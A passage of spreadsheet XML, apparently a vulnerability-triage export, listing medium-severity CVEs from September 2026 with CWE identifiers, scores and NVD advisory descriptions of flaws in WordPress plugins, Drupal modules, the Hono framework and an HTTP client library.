        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="R1001" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Insufficient Session Expiration vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to session theft.</t>
        </is>
      </c>
      <c r="S1001" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80174</t>
        </is>
      </c>
    </row>
    <row r="1002">
      <c r="A1002" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1002" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1002" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80339</t>
        </is>
      </c>
      <c r="D1002" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1002" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1002" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1002" s="5" t="inlineStr"/>
      <c r="H1002" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1002" s="5" t="inlineStr"/>
      <c r="J1002" s="5" t="inlineStr"/>
      <c r="K1002" s="5" t="inlineStr"/>
      <c r="L1002" s="5" t="inlineStr"/>
      <c r="M1002" s="5" t="inlineStr"/>
      <c r="N1002" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1002" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1002" s="5" t="inlineStr"/>
      <c r="Q1002" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R1002" s="5" t="inlineStr">
        <is>
          <t>The Payment Plugins for Stripe WooCommerce WordPress plugin before 4.0.12 does not validate the order key before adding order data to the JavaScript configuration it outputs on the front end, allowing unauthenticated users to obtain the billing details of any order, together with the secret that gates access to it, by iterating sequential order identifiers.</t>
        </is>
      </c>
      <c r="S1002" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80339</t>
        </is>
      </c>
    </row>
    <row r="1003">
      <c r="A1003" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1003" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1003" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80340</t>
        </is>
      </c>
      <c r="D1003" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1003" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1003" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1003" s="5" t="inlineStr"/>
      <c r="H1003" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1003" s="5" t="inlineStr"/>
      <c r="J1003" s="5" t="inlineStr"/>
      <c r="K1003" s="5" t="inlineStr"/>
      <c r="L1003" s="5" t="inlineStr"/>
      <c r="M1003" s="5" t="inlineStr"/>
      <c r="N1003" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1003" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1003" s="5" t="inlineStr"/>
      <c r="Q1003" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R1003" s="5" t="inlineStr">
        <is>
          <t>The Payment Plugins for PayPal WooCommerce WordPress plugin before 2.0.26 does not validate the order key before adding order data to the JavaScript configuration it outputs on the front end, allowing unauthenticated users to obtain the secret that gates access to any order and, through it, that customer's billing and shipping details, by iterating sequential order identifiers.</t>
        </is>
      </c>
      <c r="S1003" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80340</t>
        </is>
      </c>
    </row>
    <row r="1004">
      <c r="A1004" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1004" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1004" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81021</t>
        </is>
      </c>
      <c r="D1004" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1004" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1004" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1004" s="5" t="inlineStr"/>
      <c r="H1004" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1004" s="5" t="inlineStr"/>
      <c r="J1004" s="5" t="inlineStr"/>
      <c r="K1004" s="5" t="inlineStr"/>
      <c r="L1004" s="5" t="inlineStr"/>
      <c r="M1004" s="5" t="inlineStr"/>
      <c r="N1004" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1004" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1004" s="5" t="inlineStr"/>
      <c r="Q1004" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R1004" s="5" t="inlineStr">
        <is>
          <t>The SupportCandy  WordPress plugin before 3.5.3 does not perform an authorization check on one of its support-ticket attachment download paths, allowing unauthenticated attackers to read protected customer-uploaded attachments by enumerating sequential attachment identifiers.</t>
        </is>
      </c>
      <c r="S1004" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81021</t>
        </is>
      </c>
    </row>
    <row r="1005">
      <c r="A1005" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1005" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1005" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81022</t>
        </is>
      </c>
      <c r="D1005" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1005" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1005" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1005" s="5" t="inlineStr"/>
      <c r="H1005" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1005" s="5" t="inlineStr"/>
      <c r="J1005" s="5" t="inlineStr"/>
      <c r="K1005" s="5" t="inlineStr"/>
      <c r="L1005" s="5" t="inlineStr"/>
      <c r="M1005" s="5" t="inlineStr"/>
      <c r="N1005" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1005" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1005" s="5" t="inlineStr"/>
      <c r="Q1005" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R1005" s="5" t="inlineStr">
        <is>
          <t>The SupportCandy  WordPress plugin before 3.5.3 does not validate a submitted per-ticket authorization code before disclosing the real code to the requester, allowing unauthenticated users to read the contents of any support ticket.</t>
        </is>
      </c>
      <c r="S1005" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81022</t>
        </is>
      </c>
    </row>
    <row r="1006">
      <c r="A1006" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1006" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1006" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81162</t>
        </is>
      </c>
      <c r="D1006" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1006" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1006" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1006" s="5" t="inlineStr"/>
      <c r="H1006" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1006" s="5" t="inlineStr"/>
      <c r="J1006" s="5" t="inlineStr"/>
      <c r="K1006" s="5" t="inlineStr">
        <is>
          <t>dxpr_builder_project:dxpr_builder</t>
        </is>
      </c>
      <c r="L1006" s="5" t="inlineStr"/>
      <c r="M1006" s="5" t="inlineStr"/>
      <c r="N1006" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1006" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P1006" s="5" t="inlineStr"/>
      <c r="Q1006" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="R1006" s="5" t="inlineStr">
        <is>
          <t>Insertion of Sensitive Information Into Sent Data vulnerability in Drupal DXPR Builder: The Best Editing (AI) Experience for Drupal allows Forceful Browsing. This issue affects DXPR Builder: The Best Editing (AI) Experience for Drupal versions: from 0.0.0 to 2.8.1.</t>
        </is>
      </c>
      <c r="S1006" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81162</t>
        </is>
      </c>
    </row>
    <row r="1007">
      <c r="A1007" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1007" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1007" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81269</t>
        </is>
      </c>
      <c r="D1007" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1007" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1007" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1007" s="5" t="inlineStr"/>
      <c r="H1007" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1007" s="5" t="inlineStr"/>
      <c r="J1007" s="5" t="inlineStr"/>
      <c r="K1007" s="5" t="inlineStr">
        <is>
          <t>data_field_project:data_field</t>
        </is>
      </c>
      <c r="L1007" s="5" t="inlineStr"/>
      <c r="M1007" s="5" t="inlineStr"/>
      <c r="N1007" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1007" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P1007" s="5" t="inlineStr"/>
      <c r="Q1007" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1007" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization vulnerability in Drupal Data field allows Forceful Browsing. This issue affects Data field versions: from 0.0.0 to 2.0.13.</t>
        </is>
      </c>
      <c r="S1007" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81269</t>
        </is>
      </c>
    </row>
    <row r="1008">
      <c r="A1008" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1008" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1008" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81647</t>
        </is>
      </c>
      <c r="D1008" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1008" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1008" s="5" t="inlineStr">
        <is>
          <t>psirt@huawei.com</t>
        </is>
      </c>
      <c r="G1008" s="5" t="inlineStr"/>
      <c r="H1008" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1008" s="5" t="inlineStr"/>
      <c r="J1008" s="5" t="inlineStr"/>
      <c r="K1008" s="5" t="inlineStr"/>
      <c r="L1008" s="5" t="inlineStr"/>
      <c r="M1008" s="5" t="inlineStr"/>
      <c r="N1008" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1008" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1008" s="5" t="inlineStr"/>
      <c r="Q1008" s="5" t="inlineStr">
        <is>
          <t>CWE-680</t>
        </is>
      </c>
      <c r="R1008" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read vulnerability in the graphics module.
Impact: Successful exploitation of this vulnerability may affect availability.</t>
        </is>
      </c>
      <c r="S1008" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81647</t>
        </is>
      </c>
    </row>
    <row r="1009">
      <c r="A1009" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1009" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1009" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82184</t>
        </is>
      </c>
      <c r="D1009" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1009" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1009" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1009" s="5" t="inlineStr"/>
      <c r="H1009" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1009" s="5" t="inlineStr"/>
      <c r="J1009" s="5" t="inlineStr"/>
      <c r="K1009" s="5" t="inlineStr"/>
      <c r="L1009" s="5" t="inlineStr"/>
      <c r="M1009" s="5" t="inlineStr"/>
      <c r="N1009" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1009" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1009" s="5" t="inlineStr"/>
      <c r="Q1009" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1009" s="5" t="inlineStr">
        <is>
          <t>The WPLP Cookie Consent  WordPress plugin before 4.4.2 does not have any authorisation or CSRF checks when storing visitor consent state, and the code that does so runs on every front-end page load, allowing unauthenticated attackers to overwrite a site-wide option with arbitrary data.</t>
        </is>
      </c>
      <c r="S1009" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82184</t>
        </is>
      </c>
    </row>
    <row r="1010">
      <c r="A1010" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1010" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1010" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82530</t>
        </is>
      </c>
      <c r="D1010" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1010" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1010" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1010" s="5" t="inlineStr"/>
      <c r="H1010" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1010" s="5" t="inlineStr"/>
      <c r="J1010" s="5" t="inlineStr"/>
      <c r="K1010" s="5" t="inlineStr"/>
      <c r="L1010" s="5" t="inlineStr"/>
      <c r="M1010" s="5" t="inlineStr"/>
      <c r="N1010" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1010" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1010" s="5" t="inlineStr"/>
      <c r="Q1010" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="R1010" s="5" t="inlineStr">
        <is>
          <t>IP2Location Country Blocker plugin for WordPress before 2.45.0 contains an access control bypass vulnerability that allows unauthenticated remote attackers to circumvent IP-based restrictions by forging the X-Real-IP HTTP header. Attackers can set the X-Real-IP header to an allowlisted IP address to bypass page, link, or site-wide access restrictions and access otherwise-blocked resources.</t>
        </is>
      </c>
      <c r="S1010" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82530</t>
        </is>
      </c>
    </row>
    <row r="1011">
      <c r="A1011" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1011" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1011" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82848</t>
        </is>
      </c>
      <c r="D1011" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1011" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1011" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1011" s="5" t="inlineStr"/>
      <c r="H1011" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1011" s="5" t="inlineStr"/>
      <c r="J1011" s="5" t="inlineStr"/>
      <c r="K1011" s="5" t="inlineStr"/>
      <c r="L1011" s="5" t="inlineStr"/>
      <c r="M1011" s="5" t="inlineStr"/>
      <c r="N1011" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1011" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1011" s="5" t="inlineStr"/>
      <c r="Q1011" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1011" s="5" t="inlineStr">
        <is>
          <t>The Masteriyo LMS  WordPress plugin before 3.4.0 does not perform any authorization check before returning a course enrolment record over its REST API, allowing unauthenticated users to read any learner's enrolment status, timestamps and course-progress data by walking sequential record identifiers. A related gap lets any enrolled user retrieve other learners' enrolment records as well.</t>
        </is>
      </c>
      <c r="S1011" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82848</t>
        </is>
      </c>
    </row>
    <row r="1012">
      <c r="A1012" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1012" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1012" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83537</t>
        </is>
      </c>
      <c r="D1012" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1012" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1012" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G1012" s="5" t="inlineStr"/>
      <c r="H1012" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1012" s="5" t="inlineStr"/>
      <c r="J1012" s="5" t="inlineStr"/>
      <c r="K1012" s="5" t="inlineStr"/>
      <c r="L1012" s="5" t="inlineStr"/>
      <c r="M1012" s="5" t="inlineStr"/>
      <c r="N1012" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1012" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1012" s="5" t="inlineStr"/>
      <c r="Q1012" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R1012" s="5" t="inlineStr">
        <is>
          <t>The WP Express Checkout WordPress plugin before 2.5.0 does not verify server-side that a payment was actually completed before marking an order as paid, allowing unauthenticated users to forge a completed order without paying.</t>
        </is>
      </c>
      <c r="S1012" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83537</t>
        </is>
      </c>
    </row>
    <row r="1013">
      <c r="A1013" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1013" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1013" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84222</t>
        </is>
      </c>
      <c r="D1013" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1013" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1013" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1013" s="5" t="inlineStr"/>
      <c r="H1013" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1013" s="5" t="inlineStr"/>
      <c r="J1013" s="5" t="inlineStr"/>
      <c r="K1013" s="5" t="inlineStr"/>
      <c r="L1013" s="5" t="inlineStr"/>
      <c r="M1013" s="5" t="inlineStr"/>
      <c r="N1013" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1013" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1013" s="5" t="inlineStr"/>
      <c r="Q1013" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R1013" s="5" t="inlineStr">
        <is>
          <t>The Kirki  WordPress plugin before 6.3.0 does not check whether the requester is allowed to read a post before rendering and returning its page content, allowing unauthenticated users to retrieve the content of pages that are not publicly available, such as private, draft, pending and trashed ones.</t>
        </is>
      </c>
      <c r="S1013" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84222</t>
        </is>
      </c>
    </row>
    <row r="1014">
      <c r="A1014" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1014" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1014" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84364</t>
        </is>
      </c>
      <c r="D1014" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1014" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1014" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1014" s="5" t="inlineStr"/>
      <c r="H1014" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1014" s="5" t="inlineStr"/>
      <c r="J1014" s="5" t="inlineStr"/>
      <c r="K1014" s="5" t="inlineStr"/>
      <c r="L1014" s="5" t="inlineStr"/>
      <c r="M1014" s="5" t="inlineStr"/>
      <c r="N1014" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1014" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P1014" s="5" t="inlineStr"/>
      <c r="Q1014" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R1014" s="5" t="inlineStr">
        <is>
          <t>Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.13.5, when parseBody() expands dot-separated form field names into nested objects with dot-notation parsing enabled, it does not limit the nesting depth or the total number of intermediate objects created. Empty segments are preserved, so one deeply dotted field name can encode one nesting level per byte, while a large number of shallowly dotted fields can create the same amplification across a request. A request body within a normal size limit can therefore allocate an object graph far larger than the request after the body has already been accepted. An unauthenticated attacker who can reach an affected endpoint can send concurrent requests that exhaust the JavaScript heap, terminate the server process, and leave the service unavailable until restart. Dot-notation parsing is not enabled by default, and applications using the default behavior are not affected. This issue is fixed in version 4.13.5.</t>
        </is>
      </c>
      <c r="S1014" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84364</t>
        </is>
      </c>
    </row>
    <row r="1015">
      <c r="A1015" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1015" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1015" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84379</t>
        </is>
      </c>
      <c r="D1015" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1015" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1015" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1015" s="5" t="inlineStr"/>
      <c r="H1015" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1015" s="5" t="inlineStr"/>
      <c r="J1015" s="5" t="inlineStr"/>
      <c r="K1015" s="5" t="inlineStr"/>
      <c r="L1015" s="5" t="inlineStr"/>
      <c r="M1015" s="5" t="inlineStr"/>
      <c r="N1015" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1015" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P1015" s="5" t="inlineStr"/>
      <c r="Q1015" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="R1015" s="5" t="inlineStr">
        <is>
          <t>HTTPX2 is a next generation HTTP client for Python. Prior to 2.11.0, FileField.render_headers() in src/httpx2/httpx2/_multipart.py directly interpolates attacker-controlled content_type values and custom headers from the files= three-element (filename, content, content_type) tuple and the files= four-element (filename, content, content_type, headers) tuple into multipart/form-data part headers without validating header names or values. CR or LF characters can terminate a part header, inject additional part headers, or end the part header block early, allowing a downstream multipart parser to treat attacker-supplied lines as genuine headers and potentially alter part semantics or bypass header-based checks. This issue is fixed in version 2.11.0.</t>
        </is>
      </c>
      <c r="S1015" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84379</t>
        </is>
      </c>
    </row>
    <row r="1016">
      <c r="A1016" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1016" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1016" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84908</t>
        </is>
      </c>
      <c r="D1016" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1016" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1016" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G1016" s="5" t="inlineStr"/>
      <c r="H1016" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1016" s="5" t="inlineStr"/>
      <c r="J1016" s="5" t="inlineStr"/>
      <c r="K1016" s="5" t="inlineStr"/>
      <c r="L1016" s="5" t="inlineStr"/>
      <c r="M1016" s="5" t="inlineStr"/>
      <c r="N1016" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1016" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1016" s="5" t="inlineStr"/>
      <c r="Q1016" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1016" s="5" t="inlineStr">
        <is>
          <t>The WPFunnels plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 3.12.13. This is due to the plugin registering the 'wpfnl_load_payment' AJAX action for both authenticated and unauthenticated (wp_ajax_nopriv_) users and the underlying add_offer_product_to_cart() function performing no nonce verification, no capability check, and no validation that the attacker-supplied product_id is the offer product actually configured on the attacker-supplied step_id. This makes it possible for unauthenticated attackers to add arbitrary WooCommerce products to a cart at any discounted price configured on any funnel step, enabling price manipulation and revenue loss at checkout.</t>
        </is>
      </c>
      <c r="S1016" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84908</t>
        </is>
      </c>
    </row>
    <row r="1017">
      <c r="A1017" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1017" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1017" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85037</t>
        </is>
      </c>
      <c r="D1017" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1017" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1017" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1017" s="5" t="inlineStr"/>
      <c r="H1017" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1017" s="5" t="inlineStr"/>
      <c r="J1017" s="5" t="inlineStr"/>
      <c r="K1017" s="5" t="inlineStr"/>
      <c r="L1017" s="5" t="inlineStr"/>
      <c r="M1017" s="5" t="inlineStr"/>
      <c r="N1017" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1017" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1017" s="5" t="inlineStr"/>
      <c r="Q1017" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1017" s="5" t="inlineStr">
        <is>
          <t>The Sunshine Photo Cart  WordPress plugin before 3.7 does not validate that a client-supplied price identifier belongs to the item being purchased when it is added to the cart, allowing unauthenticated users to buy items at a lower price defined elsewhere on the site and complete an order at that price, resulting in financial loss for the site owner.</t>
        </is>
      </c>
      <c r="S1017" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85037</t>
        </is>
      </c>
